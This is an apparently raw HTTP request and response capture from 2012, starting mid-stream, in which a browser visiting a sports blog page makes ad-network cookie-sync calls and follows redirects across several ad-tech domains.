Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: id=4612108592868098223; mdata=1|4612108592868098223|1353202246
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=536088&amp;ev=4612108592868098223&amp;rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=10
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Expires: Fri, 30 Oct 1998 14:19:41 GMT
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Content-Length: 0
Keep-Alive: timeout=1, max=657
Connection: Keep-Alive
GET /lj_match?r=1353202246507 HTTP/1.1

Host: um.simpli.fi

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uid=arsYzhphb2F9Y9jhvoZanh%3D%3D
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: nginx
Date: Sun, 18 Nov 2012 01:30:46 GMT
Transfer-Encoding: chunked
Connection: close
Location: http://ce.lijit.com/merge?pid=2&amp;3pid=CE18BB6A616F611AE1D8637D9E5A86BE
P3P: policyref=&quot;http://www.simplifi.com/w3c/Policies.xml&quot;, CP=&quot;ADMa DEVa PSAa PSDa OUR IND DSP NON COR&quot;
GET /cm?in=1&pub=1827 HTTP/1.1

Host: p.rfihub.com
GET /cm?in=1&amp;pub=1827 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
HTTP/1.1 302 Found

HTTP/1.1 302 Found
P3P: CP=&quot;NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT&quot;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: s6=1353202246666;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:46 GMT u=&quot;aABvdhPXw==AI3oyfww==AAABOxEjpAo=&quot;;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:46 GMT e=cr;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:46 GMT a=c637540824086897895;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:46 GMT j=c637540824086897895;Path=/;Domain=.rfihub.com r=1353202246666;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:46 GMT o=1-NJVLzSACSlLX;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:46 GMT p=1-NJVLzSACSlLX;Path=/;Domain=.rfihub.com
Location: http://ce.lijit.com/merge?pid=10&amp;3pid=637540824086897895&amp;forward=
Content-Length: 0
GET /sync/img?mt_exid=17&redirect=http%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D3%263pid%3D%5BMM_UUID%5D HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=17&amp;redirect=http%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D3%263pid%3D%5BMM_UUID%5D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uuid=50a83a3f-824c-494c-a6c1-8d21845c8673; mt_mop=11:1353202243|4:1353202244|10008:1353202244
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:46 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x4 pid 0x1e98 7832
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=10008:1353202244|4:1353202244|11:1353202243|17:1353202246; domain=.mathtag.com; path=/; expires=Tue, 18-Dec-2012 01:30:46 GMT
Location: http://ce.lijit.com/merge?pid=3&amp;3pid=50a83a3f-824c-494c-a6c1-8d21845c8673
GET /ttj?id=919932&size=300x250&referrer=http%3A//ad.yieldmanager.com/iframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&pt1=http://network.realmedia.com/3/bloguin/Passback/124112090@x15?RM_Exclude=USNetworkMAX_COMPCATEGORY&ext_inv_code=bloguin&cb=124112090&reserve=0.25&pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245? HTTP/1.1

Host: ib.adnxs.com
GET /ttj?id=919932&amp;size=300x250&amp;referrer=http%3A//ad.yieldmanager.com/iframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&amp;pt1=http://network.realmedia.com/3/bloguin/Passback/124112090@x15?RM_Exclude=USNetworkMAX_COMPCATEGORY&amp;ext_inv_code=bloguin&amp;cb=124112090&amp;reserve=0.25&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245? HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bvo8f?UWmn&lt;7n; sess=1; icu=ChII64YEEAoYAiACKAIwxPSghQUQxPSghQUYAQ..; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb508244=![nC'208WMELHn6E/qX3N6)[-?enc=09LS0tLS8j8AAAAAAADwPwAAAAAAAPA_Hxj2ajYF8z9D_plBfGD2P90kqW0UMh5UoArzhH1cTlFEOqhQAAAAAK-WCAACAgAANQEAAAIAAACdkRIA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAArkwBAgUCAQUAAAAAASAjZgAAAAA.&amp;tt_code=1651067&amp;cnd=%21_CJ5AAiKeRCdo0oYACDnsQUwADiHuAFAAEi1AlCvrSJYAGDYBmgAcAB4AIABvgqIAegCkAEBmAEBoAEBqAEDsAEAuQFRTJOAfGD2P8EBUUyTgHxg9j_JARe7GVb71f0_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+3338%2C+1353202244%29%3Buf%28%27r%27%2C+1216925%2C+1353202244%29%3Bppv%282932%2C+%276061337211807802589%27%2C+1353202244%2C+1354411844%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21ewSJIQiKeRCdo0oY57EFIAA.&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:46 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:46 GMT; domain=.adnxs.com; HttpOnly icu=ChII64YEEAoYAiACKAIwxPSghQUKEgjTzAgQChgBIAEoATDG9KCFBRDG9KCFBRgC; path=/; expires=Sat, 16-Feb-2013 01:30:46 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bvo8f?UWmn&lt;7n; path=/; expires=Sat, 16-Feb-2013 01:30:46 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 18 Nov 2012 01:30:46 GMT
Content-Length: 1383
GET /match?p=31&ord=20120711T025630 HTTP/1.1

Host: match.rtbidder.net
GET /match?p=31&amp;ord=20120711T025630 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: rtbidder
Date: Sun, 18 Nov 2012 01:30:45 GMT
Content-Length: 233
P3P: policyref=&quot;http://match.rtbidder.net/p3p.xml&quot;, CP=&quot;NOI DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo HISa TELo OUR STP&quot;
Pragma: no-cache
Set-Cookie: bsuid=%3EtLIHZe%21%3A%28BRn%23%28; path=/; domain=.rtbidder.net; expires=Sat, 16-Feb-2013 01:30:45 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-store, no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://ce.lijit.com/merge?pid=13&amp;3pid=50a83a45a735dc4b5be8a818
GET /TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66900&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=728X90&rq=1&dw=300&cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&cwr=&mrnd=6611261&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/GetAd.aspx?tagver=1&amp;cp=520266&amp;ct=66900&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=728X90&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;cwr=&amp;mrnd=6611261&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=2; wf=0; pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: application/x-javascript;charset=utf-8
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
CW-Server: LGA-APP203
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:46 GMT
Content-Length: 890
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: 66900_728X90__POSUNKNOWNXUNKNOWN=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ 66900_728X90__POSUNKNOWNXUNKNOWN=1353202372225; Domain=.contextweb.com; Expires=Sun, 18-Nov-2012 01:33:02 GMT; Path=/ vf=3; Domain=.contextweb.com; Expires=Sun, 18-Nov-2012 05:00:00 GMT; Path=/
GET /if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&vpid=1&referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&media_subtypes=1&dlo=1 HTTP/1.1

Host: ib.adnxs.com
GET /if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&amp;vpid=1&amp;referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&amp;custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&amp;media_subtypes=1&amp;dlo=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bvo8f?UWmn&lt;7n; sess=1; icu=ChII64YEEAoYAiACKAIwxPSghQUKEgjTzAgQChgBIAEoATDG9KCFBRDG9KCFBRgC; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb508244=![nC'208WMELHn6E/qX3N6)[-?enc=09LS0tLS8j8AAAAAAADwPwAAAAAAAPA_Hxj2ajYF8z9D_plBfGD2P90kqW0UMh5UoArzhH1cTlFEOqhQAAAAAK-WCAACAgAANQEAAAIAAACdkRIA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAArkwBAgUCAQUAAAAAASAjZgAAAAA.&amp;tt_code=1651067&amp;cnd=%21_CJ5AAiKeRCdo0oYACDnsQUwADiHuAFAAEi1AlCvrSJYAGDYBmgAcAB4AIABvgqIAegCkAEBmAEBoAEBqAEDsAEAuQFRTJOAfGD2P8EBUUyTgHxg9j_JARe7GVb71f0_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+3338%2C+1353202244%29%3Buf%28%27r%27%2C+1216925%2C+1353202244%29%3Bppv%282932%2C+%276061337211807802589%27%2C+1353202244%2C+1354411844%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21ewSJIQiKeRCdo0oY57EFIAA.&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:46 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:46 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bvo8f?UWmn&lt;7n; path=/; expires=Sat, 16-Feb-2013 01:30:46 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 18 Nov 2012 01:30:46 GMT
Content-Length: 2657
GET /bh/rtset?do=add&pid=536088&ev=4612108592868098223&rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=10 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=536088&amp;ev=4612108592868098223&amp;rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=10 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=3; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; 66900_728X90__POSUNKNOWNXUNKNOWN=1353202372225
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-37-63-220
Date: Sun, 18 Nov 2012 01:30:45 GMT
Expires: -1
Location: http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb&amp;can=10
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:46 GMT; Path=/ 